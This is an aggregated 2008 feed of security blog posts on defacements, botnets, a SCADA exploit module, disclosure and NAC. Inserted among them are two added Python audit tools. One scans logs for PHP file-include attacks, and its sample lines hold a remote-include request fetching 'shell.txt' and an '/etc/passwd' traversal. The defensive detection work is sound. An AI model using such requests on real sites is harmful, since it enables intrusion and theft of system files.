Thursday, September 11, 2008

Spliced feed for Security Bloggers Network

Kosovo Hackers Hacking hosting firms (and Joomla, what else?) for Kosovo [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 07:04 AM CDT

This is their trophy page for the moment, but it is not at all clear why they also hack .be domains when Belgium has declared that it will recognize Kosovo. Maybe the political actions aren't that well understood or their software isn't that well managed, but if you launch a political hack campaign you should at least do your political research. Click on the image to enlarge.

[image: lentje05 Sep. 11 14.00]
But another thing is that a whole series of hosting firms have been hacked by them, aside from the typical stupid Joomla sitting ducks that continue to be shot down at a decreasing but still significant rate. Of the hosting firms we give just one example; the rest you can find in their list.



hacked Belgian online shops: just trust us [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 06:48 AM CDT

transatlantic consumer organisations and interoperability and open software standards [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 06:35 AM CDT

Resolution on Software Interoperability and Open Standards

Consumer organizations clearly see interoperability as an important means to achieve consumer welfare in the sector of Information and Communication Technologies. Consumer interest relies heavily on the ability to exchange data from one software application to another, and from one person to another, but also on the ability to understand that information so that it can be used. Standardisation and Open Standards can be useful tools to achieve interoperability.

There does not appear to be a clear policy approach on the part of the EU and US governments to promote interoperability in order to improve consumer welfare. Instead, efforts to develop interoperability tend to be left to market players. While this may be a valid policy approach in some emerging services, it requires rigorous and ongoing assessment to determine whether the market has delivered the necessary interoperable environment to serve the needs of consumers and the social welfare.


The Status of Recent Research Concerning Data Breaches and Reputational Risk

Posted: 11 Sep 2008 06:00 AM CDT

Nearly three years ago, Ken Belva wrote a paper intended to be a “starting point for further, positive discussion” regarding the topic of data breaches and reputational risk.  The title of the paper also presented Ken’s major theme:  “How It’s Difficult to Ruin a Good Name:  An Analysis of Reputational Risk.”

The paper analyzed trends associated with stock prices of several prominent retail and financial services corporations that had experienced well-publicized data breaches.  Ken concluded that, for these organizations, the announcement of a breach was usually followed by a brief dip in the closing price of a company’s stock, quickly followed by a sustained rise.  Ken interpreted this counterintuitive finding as evidence that a data breach does not necessarily pose a reputational risk to an organization, as long as (1) there is no sustained pattern of similar breaches experienced by the company and (2) the organization’s primary business does not involve providing a service where information security is an integral element.  Polo Ralph Lauren and Citigroup, two of the companies discussed in Ken’s study, are not selling security as a major service; ChoicePoint, however, offers security controls as an essential feature of its product.

Ken’s thesis was validated when, in January 2007, TJX (the parent company for Marshall’s, TJ Maxx, and other retail establishments) announced the unauthorized disclosure of credit card data concerning millions of customers.  The breach was announced on January 17.  That day, TJX closed at $29.63, down .22 from the previous day.  On the next day, the stock fell an additional .13.  However, two days following the breach announcement, TJX shares closed at $30.03, a .40 rise since the announcement.

Read the rest of The Status of Recent Research Concerning Data Breaches and Reputational Risk (1,263 words)

© Sam Dekay for, 2008. | Permalink | No comment

Belgium is still not closing its Botnet control centers [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 05:46 AM CDT

There have been indications that the number of PCs that have become zombies in a botnet has risen enormously in the last month. Probably they are activating the infections that were carried out by the Storm Worm and the SQL injections of the last months. As both of these campaigns were rather successful, because the viruses (e.g. the CNN campaign) were only detected by most antivirus products hours or days after their launch and because the SQL injections in the sites were only removed very slowly, it doesn't come as a surprise.

But those zombies are only really dangerous if they are actually controlled by a control center that sends them instructions. The owner of the PC won't see a thing, because those zombies are used in such a way that the user doesn't notice anything and so doesn't start cleaning and protecting his machine.

Belgium is one of the countries that has the most problems with closing down and cleaning up those botnet control centers. The numbers reinforce the demand for an active CERT that can take on this problem and organize the response to it.

The numbers are from Shadowserver and are just a small part of the problem; they are only based on what their honeypots see.

[image: lentje01 Sep. 11 12.39]

The use of vulnerable CitectSCADA in Belgium [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 05:33 AM CDT

There will be vulnerable CitectSCADA critical infrastructure in Belgium, because several firms have installed and deployed it. We can only hope that they have patched and investigated their systems and are keeping a close watch on their log files to be sure that all attacks are stopped. The problem may be that those Metasploit attack tools find other vulnerabilities in other parts of the infrastructure that can have the same effect.

There are also some small and medium enterprises that use this software, and here the problem could be that they don't have the necessary knowledge and monitoring contracts to be sure that they are patched.

It is not up to me to write here the names of the firms that use that software, but it is about time that the firms that installed that software call those clients to be sure that they are patched, even if they don't have a contract (yet), so that nothing bad happens to their clients.

Critical infrastructure is actually under heavy attack now [belsec] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 05:23 AM CDT

When we talk about SCADA it isn't about a car but about the IT infrastructure in our electrical, gas and other utilities that monitors and controls those installations. Most of that software and hardware was developed years ago, always more or less with the feeling that it wasn't connected to the internet and couldn't be attacked as such. Many of those installations that weren't meant to be connected to the internet now have internet connection points to make life easy for the IT guys, without imagining everything that is possible and its consequences.

It is a small risk they took, but just like the financial credit guys, they couldn't imagine the consequences if something went wrong, as Murphy is never on holiday and always finds you when you aren't ready for him.

There was a vulnerability for a certain SCADA software package that was published. This isn't so bad, but when people develop exploits based on that vulnerability that can be inserted into automated scanning and attack tools, this changes the whole spectrum of attacks you can see arriving at your networks. Such an exploit plugin has been developed for Metasploit, and the ports of the software to be attacked have seen a very significant rise in use and intensity. This means that people are in fact looking for vulnerable critical infrastructure that can be hacked this way. So don't be surprised if in the coming weeks you read articles about hackers or others having penetrated such critical infrastructure.

You should follow the Internet Storm Center for more news about this issue.


MX Lab offers Unified Communications Protection [mxlab - all about anti virus and anti spam]

Posted: 11 Sep 2008 03:05 AM CDT

MX Lab offers Unified Communications Protection based on FaceTime’s Unified Security Gateway (USG) appliance, which allows enterprises to communicate and collaborate in a safe environment without sacrificing security and control.

Combined with the in-house developed and managed MX Lab Zero Hour Anti Virus & Anti Spam services, this offers a complete solution for your business communication, whether it’s email, web, IM or Skype.

Read the press release MX Lab offers Unified Communications Protection at the MX Lab web site

Moving email from the iPhone to Outlook, no can do? [StillSecure, After All These Years]

Posted: 11 Sep 2008 02:11 AM CDT

Sitting here writing this on the plane to Sacramento.  I have a presentation that I am giving tomorrow that was mailed to me this afternoon. It is on my iPhone and I would like to work on it on my computer on the plane.  If I had a Windows Mobile phone (like I used to) that would be no problem.  When I did an ActiveSync, my mail would sync as well.  Also, I could access all of the files on my Windows Mobile phone and convert and move them over to my laptop.  However, now that I have a fancy iPhone, no can do.  I could be working on my presentation for tomorrow during the 4 hour trip.  BUT NO! I am blogging my frustrations, while that file I need is trapped on my iPhone with Apple's magic holding the key. I am sure there is some application I could buy or download that would allow me to unlock this file and move it over, but I can't get it while in the air.  So instead I will just keep blogging.

I expected more around integration with Exchange and Outlook from Apple.  They need to do a better job before Microsoft starts running commercials where Bill Gates is a Windows Mobile phone and Jerry Seinfeld is an iPhone.  Then Bill can really have something to shake about.

Everything I need to know I learned from Sex and the City [StillSecure, After All These Years]

Posted: 11 Sep 2008 02:09 AM CDT

Coming home on the plane last night I had a chance to catch the "Sex and the City" movie. I admit that I watched the HBO series with my wife and was sorry it ended.  When the movie came out, my wife went with her friends on the first night it opened and I stayed home.  No biggie, I figured it was a chick flick anyway.  So when I saw it as an option on the flight home, I thought it would be a great time to see it for myself.  Within just a few minutes I felt like I was back among old friends.  Carrie, Charlotte, Miranda and Sam - I have watched these girls grow up in NYC.  Of course Mr. Big, Steve, Smith and Harry were there. Aiden and Petrovsky weren't there, but hey, I liked those guys too. Tell the truth: which of you has ever watched this show and not found fragments of your personality in these characters?  Be really honest with yourself: which of the characters have you thought you are most like?  I thought so. I am not alone.  Like most of you I have seen myself in multiple characters on the show. Elements of my relationship have been dead on to those on the show.

Now, I have never held myself out as an expert on women and relationships.  As a matter of fact, I have always been a bit slow, truth be told.  Having several friends recently going through breakups of both marriages and long standing relationships, as well as dealing with getting older and not being a 20-something or even a 30 something anymore, this movie really struck home. Watching this movie I was moved to tears and laughter at the same time. It was not over the fashions either.

No, the characters are not real and there is no exact clone of you or me. But collectively there is so much truth and lessons to be learned in this movie and with these characters.  The writers and creators have done an excellent job of staying true to the original show and making a movie that even a somewhat oversensitive guy could truly appreciate!  If you get a chance rent the DVD when it is out.

Now if I can only get my email off that damn iPhone I can get some work done on this plane ride instead of writing about this stuff!

The mystery of Crop Circles solved! [/dev/random] [Belgian Security Blognetwork]

Posted: 11 Sep 2008 01:40 AM CDT

CSRF Vulnerability in Twitter Allows Forced Following [Darknet - The Darkside]

Posted: 11 Sep 2008 12:39 AM CDT

I did mention this earlier in the week when I was talking about Twitter being used as a malware distribution platform, there also seems to be an auto follow vulnerability that spammers would love. Do you remember Myspace and samy with 900,000 friends? Now we have johng77536 on Twitter! Last week, TechCrunch's Jason Kincaid wrote about an [...]

Read the full post at

Cloud Computing and the Internet Integrity Challenge [ARCHIMEDIUS]

Posted: 11 Sep 2008 12:06 AM CDT

Om Malik certainly deserves credit for talking about the vision of cloud computing two years ago, as well as understanding the potential opportunity posed by new relationships between the browser and the service provider in his recent piece in BusinessWeek:   In the meantime, always-on broadband connections at home, work, and on the move have become commonplace. [...]


Posted: 10 Sep 2008 10:40 PM CDT

I’m actually a little disappointed I’m using that word because it’s the new “hip” word and I usually try to stay away from what all the cool kids are doing.

Yesterday, four of us walked out of our network operations center just before lunch.  Right outside our door sits a male programmer.  As I and two others walked out to go to lunch I noticed a woman wearing a pink shirt sitting at this guy’s desk in his chair.  Not only was she sitting in his chair, she was leaning over plugging something into his computer.  Another guy and I walked one way to the restroom while the third walked the other way.  Shortly after the three of us walked by this unknown woman, a fourth member of our department walked out the same door by this desk and noticed the woman sitting there as well.  NOT A SINGLE ONE OF US SAID A THING TO HER!  As I got to the restroom I realized what I had done and started kicking myself.  On my way back I was going to ask who she was, but she was gone.  Luckily she was only plugging in an iPod to charge, but the psychological damage was done.  Four “security-minded” people walked by a desk with an unknown person at it and not a single word was said.  Only two of us even noticed she was sitting at a desk a guy usually sits at.  Talk about feeling like an ass clown.

What was the popular catch phrase after 9/11/2001?  Be in a constant state of awareness.

Google's new Browser Chrome: an overview of articles [Security4all] [Belgian Security Blognetwork]

Posted: 10 Sep 2008 07:03 PM CDT

Here is an overview of some of the information published about Google's own browser:
I kind of feel bad for Chrome because since its release, it seems people went at it like piranhas. Which is good. Good scrutiny during its beta phase can help improve it.

It started with denial of service bugs, carpet bombing (the ability to drop files on the user's desktop), EULA discussions, etc.

Although some of these issues have already been fixed, there are some things that I don't like at all.
  1. It seems that even after an uninstall of the Chrome browser, it leaves a scheduled task behind to run the GoogleUpdate program, and the googleupdate.exe itself is also left behind. An uninstall shouldn't leave binaries behind.
  2. If the observation from Mubix is correct (see the Room362 article), Chrome updating itself without any user interaction is just evil. Even the Apple updater allows you to deselect items (like Safari, which they seem to keep force-feeding to users). I wonder if it's vulnerable to something like Evilgrade.
Summary: Wait until it's left the beta phase for general use and Chrome gets some additional security improvements. Some of its (security) concepts are good, but they are not there yet.

(Photo under creative commons from aacool's photostream)

Early release of some of the Defcon 16 videos [Security4all] [Belgian Security Blognetwork]

Posted: 10 Sep 2008 06:23 PM CDT

We've decided to do an early release of a few of the news-making presentations from DEFCON 16 in video format! The following links are in two formats, the h.264 version is an iPod compatible version of the presenter's slides with audio of the speech, and the full .mov is quicktime with dual video of the speaker and the slides. Enjoy, and keep your eye out for all the videos and audio from DEFCON 16 to be released in the next couple months!
Brenno De Winter - Ticket to Trouble

Dan Kaminsky - DNS Goodness

Anton Kapela and Alex Pilosov - Stealing the Internet

Mike Perry - 365 Day: Active HTTPS Cookie Hijacking

(Photo under creative commons from shootingsawk's photostream)

Simple but dreadful, part 2 - Network shares [Security Balance]

Posted: 10 Sep 2008 04:12 PM CDT

It would be impossible to write about low hanging fruits without mentioning network shares. I say it because they are usually my favorite path to elevate privileges when I’m performing a penetration test. Among stuff that I’ve already found on unprotected (I mean, Everyone - Full Control) shares are:

- Source code for critical applications

- Configuration files of applications containing database credentials (VERY COMMON)

- Configuration files of applications containing Administrator level credentials for servers (service passwords!)

- Debug logs containing a lot of sensitive information and even user credentials (SMS logs!)

- Network and systems documentation (lots of Visio diagrams)

- Personal private information (Human Resources stuff)

Network shares appear and grow on the network like tribbles. The problem starts with weak policies regulating the subject, but it grows when the infrastructure needed as an alternative to non-authorized shares is not available. If you compare companies that have a good file server infrastructure with those that are trying to save some bucks by saving file server megabytes, you will notice that the latter have a higher occurrence of non-authorized file shares. Non-authorized network shares fall in that “Shadow IT” category and are an easy bet for unprotected sensitive information. I can tell from experience that just by browsing network shares you can own an entire network. No need for leet exploits.

If you are just starting as a security manager, include it as one of your first steps: map and control your network shares. You need to know where they are, what is inside and who can access them.
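As an added example (this is not code from the Security Balance post or its author), here is a small Python audit helper for the "map and control your network shares" step: it parses icacls-style NTFS permission listings taken at share roots and flags entries that grant Everyone, Authenticated Users or BUILTIN\Users modify or full-control rights, the "Everyone - Full Control" case the post describes. The listing below is constructed for illustration (share paths and account names are invented), and the `BROAD_PRINCIPALS` and `WRITE_TOKENS` sets, the function names and the assumption that first-line paths contain no spaces are choices made for this demo, not part of icacls itself.

```python
import re

# Constructed icacls-style output for three share roots (not a real system).
# icacls prints the path and the first ACE on one line, then one indented ACE per line.
SAMPLE_ICACLS = """\
D:\\Shares\\Projects BUILTIN\\Administrators:(OI)(CI)(F)
                    NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
                    Everyone:(OI)(CI)(F)

D:\\Shares\\HR BUILTIN\\Administrators:(OI)(CI)(F)
              CORP\\HR-Staff:(OI)(CI)(M)
              NT AUTHORITY\\Authenticated Users:(OI)(CI)(RX)

D:\\Shares\\Builds BUILTIN\\Administrators:(OI)(CI)(F)
                  NT AUTHORITY\\Authenticated Users:(OI)(CI)(M)

Successfully processed 3 files; Failed processing 0 files
"""

# First line of an entry: "<path> <principal>:<rights>". The path is matched lazily up to
# the first space, so this demo assumes share root paths without spaces (icacls output is
# ambiguous there; a robust tool would take the path list from its own enumeration).
FIRST_RE = re.compile(r'^(?P<path>\S.*?) (?P<ace>[^:]+:(?:\([^)]*\))+)\s*$')
CONT_RE = re.compile(r'^\s+(?P<ace>[^:]+:(?:\([^)]*\))+)\s*$')

# Principals that effectively mean "anyone on the network" (lower-cased for comparison).
BROAD_PRINCIPALS = {
    'everyone',
    'nt authority\\authenticated users',
    'builtin\\users',
    'builtin\\guests',
    'nt authority\\anonymous logon',
}
# icacls right tokens that allow changing content: full, modify, write, generic all/write, write data.
WRITE_TOKENS = {'F', 'M', 'W', 'GA', 'GW', 'WD'}


def parse_icacls(text):
    """Return {path: [(principal, [right tokens]), ...]} from icacls-style output."""
    acl = {}
    current = None
    for line in text.splitlines():
        if not line.strip() or line.startswith('Successfully processed'):
            continue
        m = FIRST_RE.match(line)
        if m:
            current = m.group('path')
            acl.setdefault(current, [])
            ace = m.group('ace')
        else:
            m = CONT_RE.match(line)
            if not m or current is None:
                continue
            ace = m.group('ace')
        principal, rights = ace.split(':', 1)
        # "(OI)(CI)(F)" -> ['OI', 'CI', 'F']; specific rights may be comma-joined, e.g. "(RD,WD)".
        tokens = [t for grp in re.findall(r'\(([^)]*)\)', rights) for t in grp.split(',')]
        acl[current].append((principal.strip(), tokens))
    return acl


def find_exposed_shares(acl):
    """Flag ACEs that give a broad principal write or full-control access."""
    findings = []
    for path, aces in acl.items():
        for principal, tokens in aces:
            if principal.lower() not in BROAD_PRINCIPALS:
                continue
            if 'DENY' in tokens:
                continue  # an explicit deny entry restricts rather than grants
            granted = sorted(set(tokens) & WRITE_TOKENS)
            if granted:
                severity = 'full_control' if {'F', 'GA'} & set(granted) else 'write'
                findings.append({'path': path, 'principal': principal,
                                 'rights': granted, 'severity': severity})
    return findings


if __name__ == '__main__':
    for f in find_exposed_shares(parse_icacls(SAMPLE_ICACLS)):
        print(f"{f['severity']:<12} {f['path']}  {f['principal']} {f['rights']}")
```

Note that icacls reports NTFS permissions only; the share-level permissions layered on top (shown by `net share <name>`) can be looser or tighter, so an inventory should record both, plus what the share actually contains.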

NAC and DLP [Security Balance]

Posted: 10 Sep 2008 03:39 PM CDT

I was reading a comment from Shimel mentioning that NAC technology is becoming more mature every day, as we can see more 3rd party product integration. He mentions the integration of an IPS system, which promptly made me wonder about another kind of security product: DLP.

Has anybody tried to integrate DLP and/or e-Discovery products with NAC? Can you imagine the possibilities? You can build a policy where workstations with protected/sensitive information stored have their connectivity restricted to reduce the chances of data loss. If your computer is free of protected information, you can browse the Internet with more freedom than that guy with sensitive files on his hard disk. I wonder if anyone from Symantec is trying to do that with Vontu and their Endpoint Protection suite.

The Risks of Security Non-Disclosure [Digital Bond]

Posted: 10 Sep 2008 02:59 PM CDT

As there has been a furor of emails on various lists regarding the recent Citect vulnerability Metasploit modules I thought a little discussion of the risk of Non-Disclosure might prove valuable. 

Disclosure and the development of such modules do increase exposure. An unpatched, unmitigated, and exposed system now becomes ripe for exploitation by script kiddies, which does increase exposure and risk. But what is the risk of an undisclosed vulnerability?

Does a vulnerability that has not been disclosed not exist? Does the risk suddenly spring into existence because it is published/disseminated? Of course not. It was there and hidden, and possibly known by someone.

My experience in performing and exposure to the results of software and protocol reviews employed by SCADA and Digital Control systems leads me firmly to the conclusion that these systems are rife with vulnerabilities of the most basic type, namely simple buffer overflows. In my opinion there exist one or more such simple exploits in every product used in our industry, though much has been done to reduce this in the newest and soon to be released products.

The IT side of software development went through these types of growing pains 10 years ago as the knowledge of finding these types of bugs disseminated across the globe. The publication of these flaws does increase exposure and in turn risk, but the disclosure also drives mitigation.

When first contacted about said stack overflow flaw (according to the publicly available timelines) the vendor basically responded with “Meh, we are not going to do anything about it.” It was only as their awareness of the ramifications of the flaw grew, that they took action to mitigate. And they were very slow in doing so. Yes the publication of such a vulnerability does possibly create PR and financial backlash for the vendor, but it does not create the flaw, it already existed and therefore is inherent risk.

To get a better picture of what I am speaking of, consider the following video entitled “Did You Know” that I first saw at the DOE CST conference of 2007 (provided in wmv and mov format). Pay particular attention to the segments that touch on the populations and potential of China and India. China proved in this round of Olympics that when you have a population of over 1 billion people, statistically speaking, you have a lot of exceptional people in any field you choose (this includes people who make good hackers). The video notes that the 25% of people in China with the highest IQs exceeds the total population of North America, e.g. the United States, Canada and Mexico combined, and, in the vernacular of school teachers, that the number of “honor” type students in China’s educational system exceeds the total number of children in North America.

To think that only one researcher or research group has found a specific 0 day exploit for a control system is to ignore the odds. To think that there are not groups in other nation states sitting upon 0 days is, in the phrasing I have oft used, “sheer insanity.” The vulnerabilities are remedial at best and very simple to find. The majority of such simple bugs were weeded out of the IT side of things years ago but are still prevalent in the majority of the products that we use to control “Critical Infrastructure.” And as it is critical, the risk is that much higher. The recent leak of the firmware vulnerability is a case in point. Everyone with exposure to these systems knew that this was a risk, and no one was surprised by the contents of the briefing.

It seems to me, and I think history supports the assertion, that vendors will only move to mitigate when facing imminent disclosure. Hence disclosure drives mitigation. Disclosure does not increase risk as much as non-disclosure, because at least through disclosure awareness is gained and mitigation becomes available.

This is why in hacking circles the undisclosed 0 day is so coveted. There are no mitigations impeding the use of a 0 day exploit. It is the golden key. Due to the ease of finding the flaws in control system software how many “research groups” with good or bad intentions are sitting upon 0 day exploits against critical infrastructure? And if you think the answer is 0 then you live in a different world……


First Beam [Phillip Hallam-Baker's Web Security Blog]

Posted: 10 Sep 2008 12:23 PM CDT

Congratulations to CERN for achieving first beam on the LHC.

I was present at first beam for HERA and LEP. It takes a great deal to make these things work.

Update: Contrary to the claims being made in the popular press, no this is not an atom smasher, it is a proton-proton smasher. No atoms are harmed during this experiment (unless you count ionizing hydrogen atoms in the proton beam generator). No this is not recreating the big bang. Nor was there the slightest chance that this test would have created a mini-black hole that would eat up the earth, the beams never collided. That comes later in the year.

Folk need not worry however as equally energetic collisions are taking place in the upper atmosphere all the time. If 80 GeV electron-proton collision were sufficient to create a stable black hole we would have been eaten up years ago.

Update II: Yes, LEP was an electron-proton smasher, the Large Hadron Collider is just protons. It is actually the same tunnel. My point was that you can accelerate leptons or hadrons with a synchrotron like the ones at DESY or CERN. An atom has no charge, so it is going to be difficult to accelerate. There are still a few atom smashers around, but most of the physics of atoms is known. The LHC is designed to study particles at much smaller scale.

NAC makes for strange bedfellows [StillSecure, After All These Years]

Posted: 10 Sep 2008 12:13 PM CDT

A couple of articles today forced me into an Aha! moment on NAC.  I think you can tell when a technology begins to mature when you see announcements about how the products are working with 3rd party products.  On the other hand, I think it also shows what the strengths and weaknesses of individual vendors are as well.

Two cases in point

1. Bradford announces that it plays well with Top Layer - This press release details how Top Layer IPS can alert Bradford's NAC product to devices on the edge sending out bad traffic.  At that point presumably Bradford would be able to quarantine the offending device.  According to the spin this results in "core to edge" protection.

Well, this is certainly not new.  Bradford has advertised working with 3rd party IPSs for some time.  Bradford is not alone in this either.  There are several NAC vendors, including StillSecure, that can do this.  But is integrating with an existing IDS/IPS a post-connect NAC solution?  I don't think so. I don't think it is truly a holistic approach.  All you are doing is sending out a syslog alert and, based upon that, quarantining a device.  No context, no depth; you are piling one separate solution on top of another separate solution.  While, as I have said, this integration is not new, we have been working for a long time to take our own IDS/IPS technology and use that as the basis of a true post-connect NAC sensor.  Integrating the products into a common UI, with common policies, rule sets and management, is where the value is.

A vendor who only has a NAC product that can do pre-connect health checks (which are valuable in and of themselves) but can then only "integrate" by passing data back and forth is going to have a tough time in the maturing NAC space.

2. InfoExpress teams with Alcatel-Lucent - In this story, InfoExpress talks about how they teamed up to deliver a secure wireless solution to Iona College.  Good for InfoExpress; they are often left out of the NAC market discussion, though they have been selling NAC as long as anyone.  What I found surprising is what this says about Alcatel-Lucent's OEM of ConSentry gear for NAC.  Does this mean Alcatel-Lucent is no longer selling the ConSentry NAC solution? What is going on with ConSentry anyway?

One thing for sure is that NAC makes for strange bedfellows.

ThreatLinQ: Movers and Shakers [DVLabs: Blogs]

Posted: 10 Sep 2008 09:30 AM CDT

Posted by Mike Dausin
Alright, it's time for an installment of ThreatLinQ: Movers and Shakers. Most every week we will use this space to point out any interesting and/or sudden events we may see in the ThreatLinQ data. This week there are a couple of PHP File Include filters which popped up on the Movers and Shakers page which are worth talking about:

First, Filter 4270 saw a sudden increase in traffic on 9/08/2009.  This was due entirely to a single attacker from New Jersey targeting various PHP file include vulnerabilities. It looks as if this attacker resides at a hosting facility, so it would be a good bet to say this machine has been compromised. Below is a graph of this attacker's activity for the last few days:

A similar story exists for filter 6007. This time however, the IP is located in the Ukraine and appears to be targeting sites in the US and Korea. 

That's it for the Movers and Shakers summary for this week. If you have a TMC account and would like more information about the latest trends be sure to visit the ThreatLinQ portal here:

The two IPs responsible for these attacks are below:

- New Jersey U.S.A.
- Ukraine
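The filters discussed above fire on PHP file-include attempts. As an added example (not DVLabs code and not ThreatLinQ data), the Python below runs the same idea over a few constructed Apache access-log lines: it decodes each request's query string, flags parameter values that point at a remote URL (remote file include) or contain traversal sequences or a NUL byte (local file include), and counts hits per source address, the per-attacker view the post describes. The log lines, paths and addresses are constructed (documentation IP ranges), and `classify_value`, `scan_log` and `count_by_source` are names chosen for this demo.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format; addresses are from
# documentation ranges (RFC 5737) and do not refer to any real host.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Sep/2008:14:01:22 -0400] "GET /index.php?page=http://198.51.100.7/shell.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
192.0.2.10 - - [08/Sep/2008:14:01:23 -0400] "GET /modules/news/news.php?dir=https://198.51.100.7/c.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
203.0.113.5 - - [08/Sep/2008:14:02:10 -0400] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 3400 "-" "Mozilla/5.0"
198.51.100.44 - - [08/Sep/2008:14:03:00 -0400] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0"
198.51.100.44 - - [08/Sep/2008:14:03:05 -0400] "GET /search.php?q=http+servers HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
"""

# Common/combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)
# A parameter value that is itself a URL is the classic remote file include pattern.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
# Directory traversal or an embedded NUL (used to cut off an appended ".php") suggests local file include.
TRAVERSAL_RE = re.compile(r'(?:\.\./|\.\.\\|\x00)')


def classify_value(value):
    """Return 'remote_include', 'local_include' or None for one decoded parameter value."""
    if REMOTE_RE.match(value):
        return 'remote_include'
    if TRAVERSAL_RE.search(value):
        return 'local_include'
    return None


def scan_log(text):
    """Parse each request line, decode its query parameters and collect suspicious ones."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group('target'))
        # parse_qsl percent-decodes values and turns '+' into a space, so
        # "q=http+servers" becomes "http servers" and is not mistaken for a URL.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append({'ip': m.group('ip'), 'time': m.group('ts'),
                                 'path': parts.path, 'param': name,
                                 'value': value, 'kind': kind})
    return findings


def count_by_source(findings):
    """Hits per client address, the view that singles out one noisy source."""
    return Counter(f['ip'] for f in findings)


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']:<15} {f['kind']:<15} {f['path']}?{f['param']}={f['value']!r}")
    print(dict(count_by_source(hits)))
```

A single decode pass is deliberate here: double-encoded payloads (`%252e%252e%252f`) would need a second `unquote`, which is a reasonable extension if the upstream web server logs the raw request line.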

Top 10 security threats for the SMB market [StillSecure, After All These Years]

Posted: 10 Sep 2008 08:05 AM CDT

What is it about top ten lists that attracts bloggers like moths to a flame?  Are we all frustrated David Letterman wannabes?  In any event, I came across this top ten list of security threats to the SMB market. I think that many if not most of these apply to organizations of all sizes actually. I am copying it in here, as I think there is some good stuff here:

- Insiders - In many SMBs, business records and customer information is often entrusted to a single person. Without adequate checks and balances, including network system logs and automated reports, data loss from within can stretch over long periods of time.

- Lack of contingency plans - One of the biggest threats to SMBs relates to the business impact of post-hack, intrusion or virus. Many SMBs lack a data loss response policy or disaster recovery plan, leaving their business slow to recover and restart operations.

- Unchanged factory defaults - Hackers publish and maintain exhaustive lists of default logins (username and password) to nearly every networked device, and can easily take control of network resources if the default factory configuration settings are not changed.

- The unsecured home - in many small businesses, employees often take laptops home to work. In an unsecured home network environment, a business laptop can be dangerously exposed to viruses, attacks and malware applications.

- Reckless use of public networks - A common ruse by attackers is to put up an unsecured wireless access point labeled, 'Free Public WiFi' and simply wait for a connection-starved road warrior to connect. With a packet sniffer enabled, an attacker stealthily sees everything the employee types, and is then able to utilize that data for personal gain.

- Loss of portable devices - much SMB data is compromised every year due to lost laptops, misplaced mobile devices and left behind USB sticks. Although encryption of mobile device data and use of strong passwords would mitigate many of these losses, many SMB users simply fail to secure their mobile devices and data.

- Compromised web servers - Many SMBs host their own websites without adequate protection, leaving their business networks exposed to SQL injection and botnet attacks.

- Reckless web surfing - Now more than ever, malware, spyware, keyloggers and spambots reside in innocuous looking websites. Employees who venture into ostensibly safe sites may be unknowingly exposing their business networks to extreme threats.

- Malicious HTML e-mail - No longer are attackers only sending e-mails with malicious attachments. Today, the threat is hidden in HTML e-mail messages that include links to malicious, booby-trapped sites. A wrong click can easily lead to a drive-by download.

- Unpatched vulnerabilities open to known exploits - more than 90 percent of automated attacks try to leverage known vulnerabilities. Although patches are issued regularly, a short-staffed SMB may fail to install the latest application updates and patches on its systems, leaving them vulnerable to an otherwise easily stopped attack.

Corporate Governance: A Dirty Word or a Dirty Job? []

Posted: 10 Sep 2008 06:00 AM CDT

Corporate governance is in the limelight. No one wanted it, and not many embrace it. But it's here and here to stay, thanks to the horrifying outcomes of the criminal activity behind the failures of Enron, WorldCom and the like.

In the newly published anthology, CISO Leadership: Essential Principles for Success [Auerbach Publications, New York, 2008], Robert Coles and Rolf Moulton explore governance as it relates to information security. In chapter 13, entitled "Extending the Enterprise's Governance Program to Information Risks", the authors take an eye-opening and somewhat threatening stance: "In this litigious age, governance failures could result in damaged careers, shareholder lawsuits or corporate collapse."

However, because the focus is on compliance with Sarbanes-Oxley, Basel II and other knee-jerk regulations, it may be worthwhile to put corporate governance into perspective. The authors' position is that it can be leveraged to strengthen information security. Further, since governance is amorphous at best, the authors state their own definition: "Our definition of information security governance is the establishment and maintenance of the control environment to manage the risks relating to the confidentiality, integrity and availability of information and its supporting processes and systems."

Read the rest of Corporate Governance: A Dirty Word or a Dirty Job? (335 words)

© Micki Krause, 2008.

Skyrails 3D OpenGL visualisation [SOURCE Conference Blog]

Posted: 10 Sep 2008 04:19 AM CDT

Skyrails is a social network (or, really, any graph) visualisation system. It has a built-in programming language for processing the graph and its attributes (as far as visualisation attributes go). The system is not aimed only at expert users, though: through the scripting language, menus can be built and the system can be used by anyone.

The main distinguishing points of the system are the built-in scripting language, the added flexibility in how attributes are represented (nodes can be bound to planes and spheres based on their attributes) and the scriptability of the user interface. This makes Skyrails ideal for creating presentations targeted at average users.

skyrails in action:

reDuh - TCP Redirection over HTTP [Darknet - The Darkside]

Posted: 10 Sep 2008 12:57 AM CDT

What Does reDuh Do? reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page on a server, we can connect to hosts behind that server trivially. What is it for? a) Bob.Hacker has the ability to upload / create [...]

Read the full post at
